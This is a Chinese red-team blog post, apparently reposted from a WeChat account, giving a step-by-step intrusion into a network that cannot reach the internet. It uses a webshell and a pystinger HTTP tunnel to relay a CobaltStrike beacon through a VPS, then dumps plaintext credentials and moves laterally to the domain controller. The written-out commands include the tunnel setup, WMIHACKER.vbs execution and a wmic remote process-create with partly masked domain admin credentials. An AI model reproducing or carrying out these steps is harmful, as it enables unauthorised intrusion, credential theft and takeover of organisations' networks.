渗透攻击红队
一个专注于红队攻击的公众号
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/2-1628214621.jpeg "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
大家好,这里是 渗透攻击红队 的第 68 篇文章,本公众号会记录一些红队攻击的案例,不定时更新!请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关!
当跳板机器出网的情况下,我们可以随意内网渗透,只需注意免杀问题,那如何拿到一个 Webshell 不出网的情况下,如何进目标内网?如何上线到 C2?
不出网的内网域渗透
前言
首先是拿到了一个 Webshell:
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/3-1628214623.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
通过初步判断当前机器 icmp 不出网:
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/4-1628214625.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
那怎么办呢?我们可以基于 HTTP 隧道打!
基于 HTTP 隧道上线到 CobaltStrike
项目地址:https://github.com/FunnyWolf/pystinger
这个东东可以让 Webshell 实现内网 Socks4 代理,让不出网机器上线到 MSF/CS,使用 python 写的一款工具,支持目标站点 php、jsp(x)、aspx 三种脚本语言!
先上传对应的 Pystinger webshell 文件并成功访问:
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/10-1628214627.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
然后我们还需要将 stinger_server.exe 上传到目标服务器 ,执行如下命令:
start c:Windowstempcookiestinger_server.exe 0.0.0.0![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/2-1628214629.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
然后将 stinger_client 上传到 vps ,执行如下命令
./stinger_client -w http://saulgoodman.cn:9009//wls-wsat/proxy.jsp -l 0.0.0.0 -p 60000![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/2-1628214632.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
此时已将目标服务器的 60020 端口映射到 VPS 的 60020 端口了!
这个时候我们 CobaltStrike 设置监听,http host 填写目标内网的 IP 地址:192.168.0.9,端口填写 60020:
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/7-1628214635.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/0-1628214637.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
然后我们生成一个 exe,监听器就是刚刚设置的那个:
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/5-1628214641.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
然后目标运行 exe 马,直接上线到 CobaltStrike:
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/4-1628214643.jpeg "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
内网信息搜集
通过 nbtscan 对当前内网进行信息搜集发现当前内网是存在域环境的:
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/7-1628214646.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
由于当前已经是 administrator 了,且是 Windows 2008 的机器,可以直接抓明文:
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/9-1628214649.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
抓到了本地管理员和域管明文还有一些域用户的明文!既然域控是 192.168.0.2 这台,那么直接 WMI 横向把:
shell cscript c:windowstempWMIHACKER.vbs /cmd 192.168.0.2 BExxxxadministrator vmxxxxx whoami 1
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/3-1628214652.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
直接拿到域控 system 权限!我们还可以用系统自带的 WMI 来执行命令,只不过命令不回显:
wmic /node:192.168.0.2 /user:BEHxxxxadministrator /password:vm$xxxx process call create "cmd.exe /c ipconfig > c:result.txt"type \192.168.0.2c$result.txt
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/4-1628214655.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
这篇文章主要就是想表达不出网也是可以对它进行内网渗透的,并不是遇到不出网环境就不能打内网,方法很多,知识面还是会决定你的杀伤链!
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/4-1628214657.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/6-1628214659.jpeg "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/6-1628214660.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/8-1628214662.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
![[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?](http://cn-sec.com/wp-content/uploads/2021/08/7-1628214664.png "[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?")
本文始发于微信公众号(渗透攻击红队):[不出网的内网域渗透] 如何基于 http 隧道使用 pystinger 上线不出网机器到 CobaltStrike?
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论